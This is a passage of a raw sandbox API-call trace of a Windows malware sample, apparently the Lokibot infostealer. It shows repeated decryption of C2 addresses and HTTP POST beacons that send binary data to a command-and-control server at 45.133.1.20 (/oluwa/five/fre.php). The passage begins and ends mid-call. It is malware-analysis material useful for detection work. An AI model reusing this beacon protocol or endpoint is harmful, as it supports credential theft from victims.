/oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0166.006] GetProcessHeap () returned 0x6a0000 [0166.006] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0166.006] GetProcessHeap () returned 0x6a0000 [0166.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0166.007] GetProcessHeap () returned 0x6a0000 [0166.007] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0166.007] GetProcessHeap () returned 0x6a0000 [0166.007] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0166.008] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0166.009] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0166.009] GetProcessHeap () returned 0x6a0000 [0166.009] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0166.009] GetProcessHeap () returned 0x6a0000 [0166.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0166.010] send (s=0x2fc, buf=0x6bbd20*, len=242, flags=0) returned 242 [0166.012] send (s=0x2fc, buf=0x6bb998*, len=159, flags=0) returned 159 [0166.012] GetProcessHeap () returned 0x6a0000 [0166.012] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6bf370 [0166.012] recv (in: s=0x2fc, buf=0x6bf370, len=4048, flags=0 | out: buf=0x6bf370*) returned 204 [0166.111] GetProcessHeap () returned 0x6a0000 [0166.111] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0166.112] GetProcessHeap () returned 0x6a0000 [0166.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0166.112] GetProcessHeap () returned 0x6a0000 [0166.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0166.112] GetProcessHeap () returned 0x6a0000 [0166.113] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0166.113] closesocket (s=0x2fc) returned 0 [0166.114] GetProcessHeap () returned 0x6a0000 [0166.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab00 | out: hHeap=0x6a0000) returned 1 [0166.114] GetProcessHeap () returned 0x6a0000 [0166.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0166.115] GetProcessHeap () returned 0x6a0000 [0166.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0166.115] GetProcessHeap () returned 0x6a0000 [0166.116] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0166.116] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6bf370, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x69c) returned 0x2fc [0166.119] Sleep (dwMilliseconds=0xea60) [0166.121] GetProcessHeap () returned 0x6a0000 [0166.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0166.122] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.122] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0166.135] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.135] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0166.154] GetProcessHeap () returned 0x6a0000 [0166.154] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0166.155] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.155] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0166.156] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.157] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0166.157] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.158] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0166.158] GetProcessHeap () returned 0x6a0000 [0166.158] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0166.159] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.160] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0166.161] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.161] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0166.162] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.162] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0166.162] GetProcessHeap () returned 0x6a0000 [0166.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0166.163] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0166.163] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0166.164] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0166.165] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0166.166] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0166.166] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0166.167] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0166.167] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0166.167] GetProcessHeap () returned 0x6a0000 [0166.167] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0166.167] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0166.168] GetProcessHeap () returned 0x6a0000 [0166.171] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0166.171] GetProcessHeap () returned 0x6a0000 [0166.172] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0166.172] GetProcessHeap () returned 0x6a0000 [0166.172] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0166.173] GetProcessHeap () returned 0x6a0000 [0166.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0166.178] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.179] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0166.189] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.189] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0166.197] GetProcessHeap () returned 0x6a0000 [0166.197] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0166.198] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.198] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad560) returned 1 [0166.199] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.199] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0166.200] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.200] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0166.200] GetProcessHeap () returned 0x6a0000 [0166.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0166.202] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.202] CryptDecrypt (in: hKey=0x6ad560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0166.203] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.203] CryptDestroyKey (hKey=0x6ad560) returned 1 [0166.204] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.204] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0166.204] GetProcessHeap () returned 0x6a0000 [0166.204] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0166.205] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0166.205] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0166.206] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0166.207] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0166.208] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0166.208] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0166.209] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0166.209] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0166.210] GetProcessHeap () returned 0x6a0000 [0166.210] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0166.210] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9c30*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be790*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0166.210] GetProcessHeap () returned 0x6a0000 [0166.210] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa00 [0166.210] socket (af=2, type=1, protocol=6) returned 0x300 [0166.210] connect (s=0x300, name=0x6be790*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0166.235] FreeAddrInfoW (pAddrInfo=0x6b9c30*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be790*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0166.235] GetProcessHeap () returned 0x6a0000 [0166.235] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beca0 [0166.235] GetProcessHeap () returned 0x6a0000 [0166.235] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0166.236] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0166.236] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0166.236] GetProcessHeap () returned 0x6a0000 [0166.236] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0166.236] GetProcessHeap () returned 0x6a0000 [0166.237] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0166.237] GetProcessHeap () returned 0x6a0000 [0166.237] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0166.237] GetProcessHeap () returned 0x6a0000 [0166.237] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0166.238] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0166.241] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0166.241] GetProcessHeap () returned 0x6a0000 [0166.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0166.241] GetProcessHeap () returned 0x6a0000 [0166.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0166.242] send (s=0x300, buf=0x6bbd20*, len=242, flags=0) returned 242 [0166.242] send (s=0x300, buf=0x6bb998*, len=159, flags=0) returned 159 [0166.242] GetProcessHeap () returned 0x6a0000 [0166.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6bf370 [0166.242] recv (in: s=0x300, buf=0x6bf370, len=4048, flags=0 | out: buf=0x6bf370*) returned 204 [0166.327] GetProcessHeap () returned 0x6a0000 [0166.327] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0166.327] GetProcessHeap () returned 0x6a0000 [0166.327] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0166.328] GetProcessHeap () returned 0x6a0000 [0166.328] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0166.328] GetProcessHeap () returned 0x6a0000 [0166.329] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beca0 | out: hHeap=0x6a0000) returned 1 [0166.329] closesocket (s=0x300) returned 0 [0166.329] GetProcessHeap () returned 0x6a0000 [0166.329] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa00 | out: hHeap=0x6a0000) returned 1 [0166.329] GetProcessHeap () returned 0x6a0000 [0166.329] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0166.330] GetProcessHeap () returned 0x6a0000 [0166.330] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0166.330] GetProcessHeap () returned 0x6a0000 [0166.330] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0166.331] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6bf370, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1324) returned 0x300 [0166.333] Sleep (dwMilliseconds=0xea60) [0166.334] GetProcessHeap () returned 0x6a0000 [0166.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0166.335] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.336] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0166.342] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.343] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0166.351] GetProcessHeap () returned 0x6a0000 [0166.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b6cc8 [0166.352] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.352] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b6cc8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0166.353] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.353] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0166.355] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.355] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0166.355] GetProcessHeap () returned 0x6a0000 [0166.356] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6cc8 | out: hHeap=0x6a0000) returned 1 [0166.357] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.357] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0166.358] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.359] CryptDestroyKey (hKey=0x6ad020) returned 1 [0166.359] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.360] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0166.360] GetProcessHeap () returned 0x6a0000 [0166.360] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0166.361] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0166.361] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0166.365] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0166.365] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0166.366] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0166.366] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0166.367] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0166.368] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0166.368] GetProcessHeap () returned 0x6a0000 [0166.368] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0166.368] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0166.368] GetProcessHeap () returned 0x6a0000 [0166.368] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0166.368] GetProcessHeap () returned 0x6a0000 [0166.369] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0166.369] GetProcessHeap () returned 0x6a0000 [0166.369] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0166.369] GetProcessHeap () returned 0x6a0000 [0166.369] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0166.370] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.370] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0166.378] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.378] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0166.386] GetProcessHeap () returned 0x6a0000 [0166.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0166.387] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.387] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0166.388] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.388] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0166.389] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.389] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0166.389] GetProcessHeap () returned 0x6a0000 [0166.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0166.391] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.391] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0166.392] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.392] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0166.393] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.393] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0166.393] GetProcessHeap () returned 0x6a0000 [0166.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0166.394] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0166.394] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0166.394] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0166.395] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0166.395] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0166.396] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0166.396] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0166.397] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0166.397] GetProcessHeap () returned 0x6a0000 [0166.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0166.397] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b99d8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be940*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0166.397] GetProcessHeap () returned 0x6a0000 [0166.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baaf0 [0166.397] socket (af=2, type=1, protocol=6) returned 0x304 [0166.397] connect (s=0x304, name=0x6be940*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0166.421] FreeAddrInfoW (pAddrInfo=0x6b99d8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be940*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0166.421] GetProcessHeap () returned 0x6a0000 [0166.421] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0166.421] GetProcessHeap () returned 0x6a0000 [0166.421] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0166.422] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0166.423] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0166.423] GetProcessHeap () returned 0x6a0000 [0166.423] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0166.423] GetProcessHeap () returned 0x6a0000 [0166.423] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0166.424] GetProcessHeap () returned 0x6a0000 [0166.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0166.424] GetProcessHeap () returned 0x6a0000 [0166.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0166.425] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0166.425] wvsprintfA (in: 